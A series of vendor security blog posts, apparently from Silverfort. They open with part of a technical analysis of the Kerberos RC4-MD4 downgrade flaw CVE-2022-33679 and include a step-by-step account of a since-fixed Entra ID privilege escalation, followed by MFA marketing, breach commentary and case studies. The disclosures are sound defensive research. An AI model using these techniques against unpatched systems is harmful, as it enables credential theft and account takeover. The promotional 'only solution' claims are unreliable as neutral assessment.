will modify the supported encryption by the KDC to RC4-MD4 as shown in the figure. As a result, (if RC4 is enabled), the client will send an AS_REQ with pre-auth using the MD4-RC4 algorithm. From this point, the attacker has two options: Brute force the 5 byte session key which might not be as efficient and might take a long time. The other option is leveraging the knowledge of the plaintext data- the pre-authentication. In Kebreros, the MITM adversary can have an accurate estimation of the plaintext pre-authentication timestamp created by the client in the AS request. The encryption mechanism lacks an initialization vector or nonce and it ignores the key usage value. As a result, the same keystream is used in different parts of the authentication exchange. So, most of the key stream uses the same RC4 keystream. The pre-auth contains an encrypted timestamp, so using our knowledge of the current time, the attacker can discover part of the keystream. If the attacker is lucky, the same keystream will be used to decrypt 4 bytes of the TGT Session key in the AS response. The last byte is overlapping with the timestamp’s least byte, which represents microseconds, which are unknown to the attacker. The last byte will be broken in a brute force attack against an achieved TGS request of the victim, as outlined below. ASN. 1 Serialization Zoom In ASN. 1 DER encoding is a tag, length, value encoding system for each element. The preauthentication timestamp is encoded using this method. The structure of the encoded timestamp consists of a sequence with two elements. The first, a GeneralizedTime object (KerberosTime)in a Zulu format. The second element is an integer which represents the Microseconds. Each element has its own tag and length following the value. For this reason, we can identify 10 constant bytes which represent all the tags and lengths. 30 -> Sequence tag 1A - (int) 26 (length of entire structure) A0 - 1st element tag 11 - element length 18 - Generalize time tag 0F – (int) value length (15) A1 - 2nd element tag 05 - (int) element length 02 - INTEGER type tag 03 - (int) value length The total amount of constant bytes is 10, we will add another 15 bytes length for guessing the timestamp. The last three bytes are the microseconds element which is not efficient to guess. Finally, additional 24 bytes of zeros before the encrypted part will give out a keystream of 49 bytes. The TGT session key is located between byte 46 to 50 of the AS response. The last missing keystream byte can be brute forced against an intercepted service ticket of the victim. Patch Thes vulenerabilies were closed by Microsoft in September security update. The update disabled the RC4-MD4 (-128) encryption type alongside with RC4-HMAC-OLD (-133) encryption type. Once patched, future AS-REQ/TGS-REQ using one of these two encryption types will receive “Unsupported encryption type” error. https://msrc. microsoft. com/update-guide/vulnerability/CVE-2022-33679 Additional Information https://bugs. chromium. org/p/project-zero/issues/detail? id=2310&q=label%3ACVE-2022-33647 – analysis by James Forshaw --- - Published: 2022-10-06 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/how-high-touch-renewed-cyber-insurance-policy/ The massive spike in ransomware attacks in 2021 – up 105% worldwide, according to SonicWall – left cyber insurance companies facing an exponential increase in claims at the end of last year. In response, insurers tightened their requirements this year, releasing a long list of specific conditions companies now need to meet in order to qualify for a policy. Among those conditions is the enforcement of multi-factor authentication (MFA) on resources across the hybrid environment, including on cloud-based email, remote network access, as well as internal and external admin access. The stringent new requirements came as a surprise to many organizations including High Touch Technologies, a Wichita, Kansas-based firm specializing in custom software and managed IT solutions for healthcare, manufacturing, and utilities companies based in America’s heartland. “We found that the requirements had changed pretty dramatically,” says Hugh Christiansen, an enterprise solutions architect with High Touch. “In particular, we saw that MFA was being mandated not just for cloud services or applications but anything that had admin access. ” Finding a way to enforce MFA across every type of admin access proved a challenge. This is because, despite the focus today on cloud-based services, most companies including High Touch still maintain a significant portion of on-prem resources that can’t be protected by MFA due to the authentication protocols they use (such as Kerberos, LDAP, and NTLM). As well, High Touch discovered they only had 60 days to identify and implement a new solution in order to retain their cyber insurance policy. “I really didn’t want a multitude of different solutions to meet this particular compliance requirement,” says Christiansen. “I wanted one solution — one interface with a single vendor. ” The company engaged with a variety of suppliers and conducted four different pilot trial runs before finding that Silverfort was the only solution that met all criteria. Silverfort is able to help companies like High Touch comply with new MFA requirements because of the unique nature of its technology. When users request access to a resource (whether cloud-based or on-prem), the identity provider then forwards authentication data directly to Silverfort for additional scrutiny. Once received, Silverfort’s AI-powered risk engine evaluates each request in real time and, if needed, can send an MFA prompt straight to the user. This is especially important for the command-line access tools that admins frequently use, such as PsExec, PowerShell, and WMI. “We looked at some big names in the industry to help us meet the insurance requirements but Silverfort was the only one that could get it done for us,” says Christiansen. With time of the essence, High Touch was especially pleased that implementation was quick and painless. Working closely with Silverfort customer success, the company was able to move from decision to roll out in less than 30 days. “In all my years of doing IT work, it was one of the quickest deployments I’ve ever seen, especially for a solution that’s so complex,” says Christiansen. “It was really amazing. ” Having successfully renewed its cyber insurance policy, the High Touch team turned their attention to fully utilizing all of Silverfort’s capabilities for threat prevention. In addition to the ability to easily fine-tune MFA policies, Christiansen was impressed that the solution could also automatically discover and monitor service accounts, including blocking access if anomalous behavior was detected. And all of this with a minimal impact on system domain controllers. “Quite frankly, our EDRs are much more resource-intensive,” says Christiansen. “Silverfort is a high-impact, low-maintenance piece of the security puzzle. ” Watch the full on-demand webinar here. --- - Published: 2022-09-29 - Modified: 2025-07-21 - URL: https://www.silverfort.com/blog/customer-case-study-preventing-ntlm-based-lateral-movement-with-silverfort/ Since its inception, NTLM authentication protocol has been infamous for its low resiliency against attackers that seek to compromise it for malicious access. While NTLM ceased to be the default in Active Directory environments long ago and many organizations now strive to restrict usage or even ban it altogether, it’s still supported and prevalent. In this blog post, we’ll recap on NTLM security risks and look at how a leading manufacturer prevented nation-state hackers from leveraging it for lateral movement with a Silverfort access policy. Short Reminder: NTLM Security Gaps NTLM Recap NTLM is an authentication protocol that replaces the sending of users’ actual passwords over the wire with an encrypted challenge/response exchange between the client and the destination server. The challenge is generated from data obtained during the logon process, including the domain name, username and a one-way hash of the user password. Once the client establishes a network connection to the server, the server sends an encrypted challenge and grants or denies access based on its response. NTLM Built-In Weaknesses NTLM is subject to certain weaknesses that make it easier for threat actors to compromise it: Weak encryption: The lack of salting makes the hash password equivalent, so if you can grab the hash value from the server, you’ll be able to authenticate without knowing the actual password. This means an attacker who can retrieve a hash – there are various ways to dump it from the machine’s memory – can then easily access a target server and impersonate the actual user. Lack of server identity validation: While the server validates the identity of the client, there is no corresponding validation of the server’s identity, which opens up the possibility of a Man-In-The-Middle (MITM) attack. Lack of Protection Against Compromise Scenarios In addition to these weaknesses, NTLM, like other protocols in the Active Directory environment, doesn’t support MFA or any other security measures that can detect and prevent malicious authentication. So, if a threat actor does attempt to leverage the weaknesses we’ve described, the chances of blocking the attack are extremely low. Silverfort’s Protection for NTLM: MFA and Block Access Policies The Silverfort Unified Identity Protection platform monitors and protects all authentications within an organization’s environment. Silverfort is the first and only solution that can enforce MFA and conditional access policies on MFA authentications. Using Silverfort, identity and security teams can monitor and govern NTLM authentications and gain the flexibility to decide, based on operational considerations, whether to protect them with adaptive policies or ban the use of NTLM altogether. Preventing a Lateral Movement Attack with NTLM Authentication Block In April 2022, a leading manufacturer and one of Silverfort’s customers was attacked by nation-state actors. The attackers’ initial target was the factory of another company, and their first step was to compromise its Wi-Fi network. By doing this, they also gained access to the laptops of several of the manufacturer’s employees who were visiting the factory at the time. The attackers realized these laptops belonged to a different company and pivoted their attack, attempting to use the compromised laptops as a beachhead into the manufacturer’s internal network. In the course of these attempts the attackers compromised one of the employees’ credentials and tried to log into servers within the manufacturer’s network over NTLM. Before the attack, the company had configured a Silverfort policy to prevent any NTLM logins from workstations to servers in its domain environment. This access policy successfully prevented the attackers from using the credentials they had compromised to move laterally within the manufacturer’s environment, ultimately blocking the attack altogether. To learn more about this attempted attack and Silverfort’s proactive threat detection and prevention, download this customer success case study here. --- - Published: 2022-09-22 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/uber-breach-key-takeaways-why-mfa-service-account-protection-pam-must-work-together-to-protect-against-compromised-credentials/ The recent Uber breach should be a wake-up call in rethinking about how identity protection is implemented and practiced in today’s enterprise environments. Because the most striking aspect of this breach is not just the role compromised credentials played but the failure of the identity protection measures that were in place to prevent the malicious use of those credentials. This attack, in fact, is a perfect illustration of why identity threats are the most prominent attack vector today because of inherent gaps in current MFA and PAM solutions. In this article, we examine these gaps and discuss Silverfort’s unified approach to identity protection via a purpose-built platform that can thwart those exact threats. Attack Flow: Compromised Credential all Along the Way Attackers obtained VPN credentials from a third-party contractor. Uber posted that “It is likely that the attacker purchased the contractor’s Uber corporate password on the dark web, after the contractor’s personal device had been infected with malware, exposing those credentials. ” With these credentials in hand, the attackers then carried out an MFA bombing attack followed by a direct call to contractor where they impersonated support staff. This resulted in the contractor approving the MFA notification thus granting the attackers access to Uber’s internal environment. Once inside, the attacker scanned the network until finding a network share which, according to the attacker’s tweet, contained some Powershell scripts. One of the Powershell scripts contained the username and password for an admin user in PAM’. Using this, he was then able access the PAM and extract data from various systems, including DA, Duo, OneLogin, AWS, and Google Workspace. Important note: being embedded in a script, this ‘domain user’ was most probably a service account was created to enable the script to perform the authentications it required to fulfill its task. It’s a common practice to hardcode such credentials into a script, but it means that they can’t be vaulted and subject to PAM password rotation, making them vulnerable to attack. From there, they accessed multiple resources at will, including posting an explicit photo on an internal message board. Gaps That Enabled the Attack Analyzing the security measures in place, we see a variety of weaknesses across the MFA and PAM solutions as well as the service account protection that enabled this attack to be successful. Let’s examine each one: MFA: Limited Protection and Partial Coverage Inability to Detect Risky Authentication: The MFA solution in place didn’t have the ability to identify continuously denied access attempts as a risk indicator, resulting in the contractor being prompted over and over. Inability to Protect Access to Network Shares: Despite its straightforward user experience, accessing a network share (either via UI or command line) triggers an authentication process in the background over the CIFS protocol. Since this service doesn’t natively support MFA, there was no protection on accessing the network share. PAM: Single Point of Failure when Deployed as a Standalone Protection Unprotected Access: There was no security control for the initial login to the PAM interface. Requiring MFA for this access would have eliminated the attackers’ ability to utilize the compromised credentials for malicious access. Single Point of Failure: Even after an attacker breached the PAM and began accessing data, it didn’t have to go further. A sound security architecture should place multilayered protections for privileged access so that even if the PAM layer is breached there are still other security controls to stop the attackers’ advance. Service Accounts: Lack of Monitoring and Protection Inability to Vault and Rotate Passwords: As explained before, credentials for service accounts that are hard coded in a script cannot be subject to password rotation and vaulting, since this will likely result in breaking the processes the script performs. However, the result in this case was critical since the exposure of these credentials enabled the attackers direct access to the PAM. The Silverfort Way: Adaptive MFA, Service Account Protection and PAM Hardening Silverfort’s Unified Identity Protection platform extends MFA to any user, system, or resource (including those that could never be protected before) and enforces adaptive MFA policies that can efficiently respond to detected risks. In addition, Silverfort places a virtual fence across service accounts to prevent misuse by threat actors. In tandem with a PAM solution, Silverfort can prevent Uber-like breaches via the following capabilities: MFA Bombing Mitigation: Silverfort policies can be configured to suppress the sending of MFA prompts to the user after a sequence of denied access attempts. While the access attempts are logged and visible in Silverfort console for the security team to investigate, the actual user doesn’t see them and thus won’t be tempted to allow access. Read more on Silverfort’s MFA bombing mitigation in this blog. MFA Protection for Network Shares: Silverfort can apply MFA protection on network share access. This is achieved by Silverfort’s integration with Active Directory, which allows every access attempt to be analyzed, regardless of authentication protocol or service used. This adds another layer of protection and prevents attackers from accessing such folders even when they have compromised credentials in hand. Dedicated Service Account Protection: Silverfort automates the discovery, activity monitoring, risk analysis, and access policy creation for all service accounts within the environment. This means that any deviation of the service account from its standard activity can trigger a policy that would block its access to the targeted resource. MFA Protection for PAM Access: Silverfort can enforce an MFA policy on the access to the PAM console itself, safeguarding it from malicious access like the one in the Uber breach. MFA or Block Access for Privileged Accounts That Access from a Non-PAM Source: Silverfort can enforce a policy that would either require MFA or block access altogether from any privileged account (i. e. , the ones stored in the PAM vault) that attempts to access resource from any source other than the PAM machine itself. Such a policy is a direct mitigation against scenarios where PAM content has been maliciously extracted by attackers who then attempt to use these newly compromised privileged credentials to access sensitive resources. The following diagram shows the flow of the attack and the various stages where Silverfort would have prevented it: Conclusion The realistic assumption security stakeholders must make is that credentials eventually will get compromised. Considering that, the ultimate benchmark to measure the identity protection part in the enterprise security stack is how resilient it is to such a scenario. As we’ve established in this article, traditional MFA solutions and standalone PAM deployment fail to provide the level of protection enterprises need today. Silverfort’s Unified Identity Protection platform is the first solution to introduce a holistic solution that combines adaptive MFA, automated service account protection and PAM hardening that can confront today’s identity threat landscape. Click here to learn more. --- - Published: 2022-09-20 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/identitys-role-as-a-strategic-risk-mitigation-tool/ For large organizations operating in an uncertain world, a big picture view of risk is crucial. Understanding and addressing the array of threats to operations brings stability of revenues, reputation, customer relationships and more. Because this means considering everything from macro-economic trends and geopolitics to potential natural disasters - there was a time when technology risk had to fight for its place around the board table. Thankfully, this is no longer the case, with hands being forced by the rapid rise of cybersecurity to the top of the agenda.   The key thing to remember is that these conversations are had by a set of stakeholders whose primary lens is not technical. By their very nature, a Risk Committee must filter a multitude of issues and translate them down to one base factor: their impact on the organization in question. Because of this, cyber risk must also be boiled down to its simplest, most non-technical constituent parts - not always an easy task for a space defined by complexity and change. First, scenarios must be gamed, and their likely business impact assessed. Only once this is understood can solutions be put forward and, crucially, their impact on resources calculated to determine if the outlay is warranted.   While this is somewhat simplified – understanding this calculus is central to approaching risk strategically. No CISO or CIO is given a blank cheque and, with the attack surface in constant flux, this process helps them work out where they lay their chips for greatest impact. This equation is one of the reasons for me joining Silverfort - as I believe identity security can play a huge part in improving this equation. Identity has been ubiquitously abused by attackers to move around environments for many years – a central route leading to everything from ransomware attacks to data breaches. Having visibility of this and closing it down with MFA greatly reduces exposure from the root cause of many attacks. In addition, by unifying a disparate array of identity technologies, Silverfort does this in a way which helps minimize resource outlay. Both sides of the equation work. As someone who has been involved in technology for 40 years, I have seen many changes first-hand. Driven by technological innovation, I believe we are seeing identity security starting to own its role in strategic risk mitigation – something I am looking forward to helping organizations achieve with Silverfort. --- - Published: 2022-09-01 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/privilege-escalation-in-azure-ad/ Privilege escalation attacks are one of the most pressing issues for security teams worldwide and are commonly used as a part of lateral movement. Threat actors know privileged accounts are harder to compromise because they are typically monitored and protected. However, attackers can employ privilege escalation vulnerabilities to take control of less monitored accounts and subsequently give themselves a high level of access – all while staying under the security team’s radar. In today’s hybrid environment, enterprises are increasingly shifting their sensitive resources to SaaS apps. Azure Active Directory is one of the leading cloud Identity Providers that enables enterprises to centrally manage access and use of such apps. We have recently discovered a privilege escalation issue within Entra ID (formerly Azure AD) that could allow an attacker to bypass a password-resetting safeguard, enabling lower-level admins to become fully privileged ones. We’ve reported this issue to Microsoft Security Response Center (MSRC), which validated it and applied a fix. While it no longer poses a risk to Entra ID (formerly Azure AD) users, we believe the wider security community can benefit from viewing our analysis and findings. Technical Analysis The Entra ID (formerly Azure AD) privileged role system works as a hierarchy, preventing lower-privileged admins from resetting the password of higher-privileged admins. In addition to the operational logic, this also safeguards against a scenario where a lower-privileged admin account is compromised by ensuring the attacker cannot modify those with higher privileges. This safeguard applies when the user’s role is set to either “eligible” or “active”. However, Entra ID (formerly Azure AD) also allows user accounts to be assigned for future use; i. e. , the higher-level privileges are granted on a predefined date and time. We discovered that in this case, the password safeguard doesn’t apply.  This exposes Entra ID (formerly Azure AD) to the following scenario: Initial compromise: An attacker compromises an admin account with low privileges. Future role assignments discovery: The attacker scans Entra ID (formerly Azure AD) to find accounts that are scheduled to become highly privileged admins in the future. Password reset: The attacker now resets the password of these accounts, compromising them before role assignment takes place. Ideally, the attacker would perform this reset as close as possible to the time of the role change. Privilege escalation: The role change takes place, providing the attacker with full control over an active highly privileged admin account. Let’s go over these stages one by one: Initial Compromise For the purpose of this analysis, let’s assume this has already taken place. The attacker has compromised the account of “Shay Katz”, which has an active assignment of “Helpdesk Administrator”. Screenshot 1: Shay Katz’ assigned roles screen The following table, taken from Entra ID's (formerly Azure AD)built-in role webpage, shows password reset rights of various roles within Entra ID (formerly Azure AD). We can see that “Helpdesk Administrator” cannot reset passwords of “Authentication Admin” and “Password Admin” roles. Screenshot 2: Entra ID (formerly Azure AD) password reset permissions table The attacker is now logged in to Entra ID (formerly Azure AD) as the user “Shay Katz”. Future role assignment discovery Prior to Microsoft’s fix, there were two options to discover future admin assignments for less privileged users: Through Entra ID (formerly Azure AD) portal, by checking the “pending request” page for a future role assignment of a higher-tier admin. Via a script, using the Resource Graph. a) Required permissions: List scheduled role eligibility requests: Requires: ReadWrite. AzureAD A list with: DeviceManagementApps. Read. All DeviceManagementApps. ReadWrite. All Directory. Read. All Directory. ReadWrite. All User. Read. All User. ReadBasic. All User. ReadWrite. All b) Run the "https://graph. microsoft. com/beta/roleManagement/directory/roleEligibilityScheduleRequests" query to get the scheduled request. Filter on status = ‘provisioned’ AND scheduleInfo > currentTime AND roleDefinitionId in protectedRoleIdList. c) Run the "https://graph. microsoft. com/beta/users? $select=displayName,id" query to get the user’s display_name using the principalId key. Using the Entra ID (formerly Azure AD) portal (option A), the attacker discovers a sample test account which currently has no “Active” or “Eligible” role assignments. Screenshot 3: ‘Test’ account without ‘eligible’ or ‘active’ assignments However, the “Request time” and “Start time” fields show us that this test account does have a pending request to be added as Global Administrator in the future. Screenshot 4: Pending request for test account to become Global Administrator The attacker now has found a worthy target: a low-privileged account with a future role assignment. We can now move to the next stage. Password Reset The attacker can now reset the test account password using the Entra ID (formerly Azure AD) portal: Screenshot 5: Password reset for test account Privilege Escalation Mission accomplished. When the defined start time comes, the test account will be upgraded to a Global Administrator account – and the attacker will have full control. Microsoft’s Fix Microsoft has addressed the issue by implementing the following controls: A low-privileged admin can no longer see pending requests in the portal. If you try to reset password for a future privileged role assignment, you are met with an error. (Usually, if you are not allowed to reset a password, the reset password button is locked. ) Conclusion As stated, Microsoft has fixed this issue, so this attack technique is no longer effective. It should be noted, however, that these types of issues within Just-in-Time access safeguards are known to attract attackers. In this case, there was a gap between the privilege assignment and the actual enablement of a security measure built to protect it. As enterprises become more cloud-oriented, threat actors’ desire to search for such weaknesses in SaaS management infrastructure is rising. We’re pleased to have had this opportunity to mitigate an exposure in the attack surface and wish to acknowledge our appreciation to Microsoft for their efficient and rapid response. --- - Published: 2022-08-17 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/cisco-breach-a-painful-reminder-of-the-lateral-movement-blind-spot/ No one is immune to breaches, as demonstrated last week when the networking giant Cisco reported a breach of its internal environment. Although reports indicate no significant harm was done, this breach presents an opportunity to reflect on the critical gaps in today’s identity protection landscape across key stages in an attack trajectory: the initial access and subsequent lateral movement. The most conspicuous gap is the lack of real-time MFA protection within an internal environment. This means that once attackers gain initial access to a machine and successfully compromise user credentials, they can execute lateral movement unencumbered. Silverfort addresses these gaps with its Unified Identity Protection platform that can extend MFA protection to any user, system, or environment — including those that have never had this protection before. The following summary is based on excerpts from the attack analysis published by Cisco’s Talos threat intelligence team and focuses on the stages that illustrate the identity protection gaps and respective security measures that Silverfort provides. Stage 1: Initial Access The Attack: Employing MFA fatigue to lure users into allowing malicious access“After obtaining the user’s credentials, the attacker attempted to bypass MFA using a variety of techniques, including MFA fatigue, the process of sending a high volume of push requests to the target’s mobile device until the user accepts, either accidentally or simply to attempt to silence the repeated push notifications they are receiving. ” The Gap: Static MFA that doesn’t respond dynamically to targeted activityIn today’s world, security measures must be smart, which means being able to deduce the meaning of event patterns, communicate them to other security products, and respond accordingly. MFA push notification that is repetitiously prompted multiple times and gets denied in all of them is a clear indication that suspicious activity is taking place. Due to the high effectivity of MFA in preventing attacks that utilize compromised credentials to access targeted credentials, it is only expected that threat actors would respond with bypass techniques, making protection against them a necessity. Silverfort Protection: Automated MFA fatigue mitigationSilverfort provides dedicated protection against MFA fatigue by suppressing user push notifications after five consecutive denied access attempts. Additionally, the user’s risk score is immediately elevated to alert the security team that the user has been targeted so they can act accordingly. Stage 2: Lateral Movement The Attack: Accessing a wide range of systems using a compromised account“After establishing access to the VPN, the attacker then began to use the compromised user account to log on to a large number of systems before beginning to pivot further into the environment. They moved into the Citrix environment, compromising a series of Citrix servers and eventually obtained privileged access to domain controllers. ” The Gap: Lack of MFA for command-line access to systemsCommand-line access tools – such as PsExec (used in this attack), PowerShell, and WMI – are the main utilities that admins use to access, configure, and troubleshoot remote machines. They are also the tools of choice for attackers to move laterally within an environment. And there is no solution that can enforce MFA protection on these interfaces due to the authentication protocols they use, which means there is no ability to block in real time an attacker who has compromised user credentials. This is the most critical gap in today’s security stack and the main reason why lateral movement attacks are still a frequent occurrence: because the technology in use hasn’t had to evolve. Silverfort Protection: MFA protection across all resources within the environmentThis MFA protection applies regardless of the access method – RDP, PsExec, PowerShell, WMI, etc – and deprives attackers from reaping any value from the compromised credentials. Whenever an attacker attempts to perform a malicious login, Silverfort pushes an MFA notification to the actual user so they can deny access outright. And this is the first instance of real-time protection being introduced to the internal environment. Stage 1A: Initial Access Revisited The Attack: Voice phishing luring employees to grant MFA approval“The attacker conducted a series of sophisticated voice phishing attacks under the guise of various trusted organizations attempting to convince the victim to accept MFA push notifications initiated by the attacker. The attacker ultimately succeeded in achieving an MFA push acceptance, granting them access to VPN in the context of the targeted user. ” The Gap: MFA single point of failureHumans are the weakest link of any security chain. Therefore, security teams should assume that a determined attacker will ultimately succeed in luring a user to act in an insecure manner. This is exactly why protection must be multi-layered: because in the Cisco attack, once VPN access was compromised the attackers never had to interact with the user again. Instead, under the cover of the compromised user accounts, they could theoretically access any resource they wanted. Silverfort Protection: Multi-layered MFA protection on all resourcesSilverfort can enforce MFA on any resource, including the Citrix servers and domain controllers that were targeted in this breach. That means that even if the attackers’ voice phishing succeeded, they would have to repeat that action every time they wanted to access a new resource – ultimately arousing the suspicion of even the most trusting user. Conclusion: Closing the Gap Silverfort’s Unified Identity Protection platform addresses a longstanding gap that threat actors have been successfully targeting for over a decade – and most recently in the case of the Cisco breach. The takeaway is that the ability to have real-time, multi-layered protection against lateral movement is a key component of any security architecture. Learn more about Silverfort’s lateral movement protection here. --- - Published: 2022-08-09 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/deadline-looms-for-compliance-with-ftcs-revamped-data-protection-rule/ On December 9 of last year, while the world braced for another wave of COVID infections, something even more serious was happening at the Federal Trade Commission (FTC), at least in terms of cybersecurity. After years of incrementally amending their Safeguards Rule (officially known as the “Standards for Safeguarding Customer Information,” a regulation focused on consumer protection with roots in the Banking Act of 1933), the FTC quietly dropped a bombshell. Having previously provided guidelines on how banks were expected to protect consumer information, the FTC suddenly got very granular on all the steps “non-banking financial institutions” needed to take to comply. From putting extensive risk assessment programs in place to implementing security measures like multi-factor authentication (MFA), the FTC was now spelling out exactly what companies needed to do to avoid enforcement action. There was also a hard deadline: December 9, 2022 — one year to the day of the published update. This post examines the implications of this updated rule for businesses, specifically examining the new security requirements and the steps companies need to take. What “Non-Banking” Means Before diving into technical details, it’s important to consider how broad the definition of “non-banking financial institutions” actually is. Clearly, the updated Safeguards Rule applies to companies that explicitly handle financial transactions: mortgage lenders, payday lenders, finance companies, mortgage brokers, account servicers, check cashers, wire transfer companies, collection agencies, credit counselors, tax preparation firms, non-federally insured credit unions, and investment advisors that don’t have to register with the SEC. But the rule potentially affects a much broader range of organizations, including car dealerships, real estate appraisers, retailers that offer their own credit cards, colleges and universities that participate in federal student financial programs, and even career counselors who work with clients in the financial services industry. This is because any company engaged in activities considered “financial in nature” is subject to the Safeguards Rule’s new requirements — particularly what the FTC calls “finders,” which are firms that bring together buyers and sellers but don’t actually handle the transaction. This remarkably wide net means that many companies could be caught by surprise in December, suddenly finding themselves subject to extensive new data protection requirements they weren’t even aware of and unexpectedly facing compliance issues. FTC's MFA Requirements for Compliance Determining which organizations are subject to the updated Safeguards Rule is just the first hurdle because implementing the specific security controls that the directive dictates is where the real work begins. Here is an overview of nine elements that the FTC will soon require:The designation of a “qualified individual” to implement and supervise a business’ information security program. Risk assessments identify exactly what customer information is stored, and where it’s stored, and evaluate any foreseeable risks and threats to that data’s security. Safeguards to mitigate identified risks, including implementing access controls, encrypting customer information, and implementing multi-factor authentication (MFA). Continuous monitoring of safeguards including system-wide scans to test for security vulnerabilities. Mandatory security awareness training for all employees, suppliers, and contractors to ensure readiness. Contracts with service providers that spell out security expectations and build-in ways to monitor their work. Regular updates to security programs so they remain current in the face of emerging threats and personnel changes. The creation of a written incident response plan in the case of a security event that results in unauthorized access to or misuse of customer data. Regular reports are prepared by the qualified individual and submitted to the company’s board of directors (or governing body). The level of detail provided here will go a long way toward prodding financially-oriented organizations to implement thorough data security programs. Yet in some ways, the FTC hasn’t gone far enough with its update — especially with regards to MFA. Granted, the agency spells out some criteria that MFA solutions should meet, including having a “knowledge factor” (i. e. a password), a “possession factor” (i. e. a token), and an “inherence factor” (i. e. a biometric characteristic). Every major MFA provider on the market meets these easily. But there is no guidance as to which specific systems MFA should be applied to, and this is an omission that could leave organizations dangerously exposed. Compare this with the directives coming out of cyber insurance companies this year. To qualify for a policy, companies now need to be able to apply MFA to cloud-based email, remote network access, as well as internal and remote admin access to directory services, network backup environments, network infrastructure (such as firewalls, routers, and switches), and organizational workstations and servers. This is because cyber insurers have skin in the game and are aggressively trying to stem their record losses from 2020 (a ratio of up to 72%, according to some studies). The gap between the public sector and the private – that is, an agency’s broad set of guidelines vs. an individual company’s need to be profitable – has never been wider. The Importance of MFA Everywhere What this leads to is a simple conclusion: The FTC has simply not gone far enough in the update to its Safeguards Rule if the goal is comprehensive data protection for consumers. The reason is that traditional MFA solutions cannot actually protect companies against one of the main vectors used in ransomware attacks — command-line access. Command-line access tools such as PsExec, PowerShell, and Windows Management Instrumentation (WMI) are used extensively by IT admins to remotely access the machines they manage. But cyberattackers also use these tools for nefarious purposes, such as moving laterally across an environment once they have compromised user credentials (usually those of an admin). In fact, nearly every recent ransomware attack has employed this exact technique. This means companies could be in full compliance with the FTC while still facing serious vulnerabilities. Because traditional MFA can’t be applied to command-line tools, since the authentication protocols (Kerberos and NTLM) they implement don’t support MFA, this presents a security challenge. Fortunately, there is a solution available: the Silverfort United Identity Protection Platform. Silverfort offers the only product on the market that features continuous monitoring of all authentications for every user, every system, and every environment, both on-prem and in the cloud. That means Silverfort can enforce MFA across an entire IT ecosystem, including every single app, interface, and piece of infrastructure — providing exactly the type of holistic protection of customer data sources (wherever they reside and however they’re accessed) that the FTC aspires to require. That’s good news for everyone: Non-banking financial institutions can have confidence that their systems are not just FTC-compliant but fully secure, while consumers can have faith that their confidential data is indeed well-protected. Learn more about the Silverfort platform. Back --- - Published: 2022-08-04 - Modified: 2025-04-16 - URL: https://www.silverfort.com/blog/cyber-insurance-win-win-brokers-clients/ As cyberattacks continue to escalate in frequency and intensity, so do the stakes for both cyber insurance providers and their clients. To address this rapidly growing threat, brokers have raised the requirements that clients must now meet in order to acquire or renew a comprehensive policy. But these more stringent requirements are proving a challenge for many companies, especially when it comes to complying with the cyber insurance multi-factor authentication (MFA) checklist. The watchword for underwriters today is “MFA everywhere,” but traditional MFA solutions can’t actually protect every resource within the modern hybrid enterprise – especially legacy systems – leaving open arcane attack vectors that cyber criminals are increasingly exploiting. Fortunately, there are solutions that providers can suggest to clients so they can enforce MFA across their entire organization. This post examines those solutions and proposes next steps both entities can take to prevent attacks and thus reduce the number of claims, decrease premiums, and improve overall security. Understanding the Urgency for Cyber Insurance Compliance The rapid rise of ransomware attacks has created soaring demand for cyber insurance policies to protect companies against financial loss, reputational damage, and legal exposure. But according to a 2021 report from the U. S. Government Accountability Office, less than half of surveyed organizations actually meet the current requirements for cybersecurity insurance, with small and medium businesses facing the biggest compliance challenges. Meanwhile, cyber insurance claims have increased tenfold since 2016, with 2022 registering a 62% year-over-year increase in ransomware complaints over 2021 according to the FBI’s Internet Crime Complaint Center. As a result, insurance providers have tightened policy requirements (for example, regularly including 40-page attestation forms) and raised premiums to mitigate against the increased risk — in some cases declining to offer coverage at all. The upshot is that cyber insurance vendors now require companies to implement more rigorous security protocols in order to be eligible for policies, with a primary focus on enforcing MFA across the entire enterprise. However, this is easier said than done, as many admin interfaces and legacy applications do not natively support MFA. Furthermore, cyber attackers have found ways to circumvent traditional MFA systems by compromising low-level system admin interfaces such as PsExec, PowerShell, Windows Management Instrumentation (WMI), and Remote Desktop Protocol (RDP) in order to steal credentials and propagate ransomware. The Essence of the Problem Cybersecurity insurance providers and companies today face a conundrum: To limit risk, brokers are now requiring every corporate system to have additional authentication procedures in place before they issue a policy; but meeting that requirement appears to be unattainable, as traditional MFA solutions can’t protect many of the legacy systems that organizations still rely on. This, in turn, means organizations can’t purchase the policy they need (and that insurers are eager to sell). As a workaround, some companies are resorting to solutions like installing server or endpoint agents, implementing network changes such as proxies, or even making code changes to the individual legacy applications themselves. Finding the Solution But to make meaningful headway on this issue, it’s actually insurers who can take important steps to alleviate the impasse – first, by helping clients ask several key questions: Is your infrastructure hybrid (i. e. , both on-premises and cloud)? Do you use common access interfaces such as PowerShell, PsExec, or MSI? How extensive and distributed is your network? Do you already have MFA tools in place you need to integrate? Secondly, brokers can recommend solutions that follow established cybersecurity best practices. For example, those that: Cover phishing-resistant methods, such as FIDO and PKI-based MFA Don’t require costly implementation, since a fast deployment means clients can easily renew an existing cyber insurance policy Offer identity protection across both on-prem and cloud resources Cover hybrid networks Are comprehensive and standalone Furthermore, they can champion those solutions that make use of important recent innovations, including: Agentless and proxyless technology to extend MFA to any resource and access interface across a hybrid environment — including legacy and homegrown applications, command-line access tools, industrial and healthcare systems, file shares, and databases. Technology that can deliver unified authentication and access policies across environments, assets, and user types. Risk engines that continuously analyze both human and entity-based requests. Systems that don’t disrupt the user experience by triaging MFA requests and elevating sensitive and high-risk situations. The Silverfort Unified Identity Protection platform meets all of the above criteria, thus presenting a compelling option that brokers can leverage to help clients comply with the new MFA for cyber insurance requirements, such as the ability to apply protocols to legacy applications and command-line access tools. Here’s the full cyber insurance coverage checklist: As well, Silverfort offers a dedicated program to incentivize insurance brokers to grow their business. This is divided into three partner pillars: Recommendations – Expedited access for clients to Silverfort experts. Referrals – Fees or rebates for each client enrolled. Resellers – Incentives for packaging Silverfort with Endpoint Detection and Response (EDR) solutions, email phishing tools, or other security systems that help clients meet enhanced cybersecurity requirements. By guiding clients to a comprehensive solution that can truly offer seamless MFA protection across an organization’s tech stack, cybersecurity insurance companies can reduce risk – both for themselves and their clients – while accelerating revenue at the same time. Learn 